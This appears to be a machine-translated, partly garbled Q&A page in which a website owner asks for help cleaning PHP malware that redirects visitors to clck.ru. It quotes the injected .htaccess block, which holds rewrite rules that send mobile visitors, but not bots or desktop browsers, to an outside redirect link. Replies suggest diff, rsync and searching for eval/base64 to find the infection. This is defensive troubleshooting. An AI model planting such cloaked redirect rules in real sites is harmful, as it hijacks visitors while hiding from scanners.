PHP网站上的恶意软件,参考clck.ru
我有一个网站,它显然包含恶意软件根据。它引用了一些指向PHP网站上的恶意软件,参考clck.ru,php,mysql,apache,malware,Php,Mysql,Apache,Malware,我有一个网站,它显然包含恶意软件根据。它引用了一些指向clck.ru的链接 查看代码时没有提到clck.ru或类似内容 我运行了maldetect(在Ubuntu操作系统上),发现了一些文件,我已经删除了这些文件 我已经更新了所有应用程序并重新启动了系统 但是Sucuri SiteCheck仍然无法验证站点是否干净 我指的网站是cphdans.dk。有人能帮我做更多的事吗 可能是某种SQL注入黑客,所以我应该在MySQL数据库中搜索一些东西(没有找到clck.ru) 更新: .htaccess文
clck.ruclck.ru.htaccess#########rataman##########
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,$
RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu9$
RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|a$
RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
RewriteCond %{HTTP:Profile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
RewriteCond %{QUERY_STRING} !noredirect [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleW$
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|ameri$
RewriteRule ^(.*)$ http://clck.ru/8sNeJ [L,R=302]
#########!rataman!#########
很抱歉听到这个消息。代码可能通过
base64evaldiffrsyncdiffdiff -Naur /path/to/infected/code/ /path/to/clean/code/
rsyncn)和CRC选项rsync -rvnc /path/to/infected/code/ /path/to/clean/code/
hello.phphello1.php尝试查找
eval.htaccess数据库中的广告或文章的一部分